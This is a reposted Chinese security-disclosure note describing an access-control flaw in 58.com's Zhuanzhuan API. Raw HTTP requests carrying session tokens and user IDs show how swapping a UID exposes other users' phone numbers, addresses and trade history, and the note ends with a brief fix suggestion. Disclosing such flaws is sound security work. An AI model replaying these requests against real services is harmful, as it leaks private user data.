频道栏目
首页 > 安全 > 网站安全 > 正文
58同城某站越权可查看用户手机号等详细信息
2016-03-07 10:16:36         来源:三石磊  
收藏   我要投稿

买过什么东西,用户手机号,地址,卖过什么东西都能看见

首先
 

https://zhuanzhuan.58.com/zz/transfer/getRecommendInfoForWZ  
POST /zz/transfer/getRecommendInfoForWZ HTTP/1.1
Cookiet=15;tk=5861E1232C16826EC31A3A6307305A43;v=1.2.1;uid=36751617753614;PPU="UID=36751617753614&PPK=9e2379a3&PPT=dd64b5fb&SK=1FC200CCC2CA2C7E9878611B0296072907ED5FEB0F9A05640<=1453167625053&UN=%E4%B8%89%E7%9F%B3%E7%A3%8A265&LV=e5d60885"; Version=1; Domain=58.com; Path=/;
Content-Typeapplication/x-www-form-urlencoded; charset=UTF-8
User-AgentDalvik/2.1.0 (Linux; U; Android 5.0.1; MX4 Pro Build/LRX22C)
Hostzhuanzhuan.58.com
ConnectionKeep-Alive
Accept-Encodinggzip
Content-Length41

data 数据
lat39.980785
lng116.424258
pageSize10



就是用户登录后获取的列表页面

这样获取所有商品列表和对应的用户UID




 

https://zhuanzhuan.58.com/zz/transfer/query
POST /zz/transfer/query HTTP/1.1
Cookiet=15; tk=5861E1232C16826EC31A3A6307305A43; v=1.2.1; uid=36374330179606; PPU="UID=36374330179606&PPK=9e2379a3&PPT=dd64b5fb&SK=1FC200CCC2CA2C7E9878611B0296072907ED5FEB0F9A05640<=1453167625053&UN=%E4%B8%89%E7%9F%B3%E7%A3%8A265&LV=e5d60885"; Version=1; Domain=58.com; Path=/; 
User-AgentDalvik/2.1.0 (Linux; U; Android 5.0.1; MX4 Pro Build/LRX22C)
Hostzhuanzhuan.58.com
ConnectionKeep-Alive
Accept-Encodinggzip
Content-Typeapplication/x-www-form-urlencoded
Content-Length0



就能获取用户的信息资料了

 

屏幕快照 2016-01-20 下午2.00.55.png

 

屏幕快照 2016-01-20 下午1.58.09.png

 

屏幕快照 2016-01-20 下午1.57.50.png

 

解决方案:

这些要加sige的东西啊

点击复制链接 与好友分享!回本站首页
上一篇:联金所短信验证码控制不严导致任意用户密码重置打包
下一篇:乐视网某分站存在svn信息泄露(数据库信息全部泄露)
相关文章
图文推荐
点击排行

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站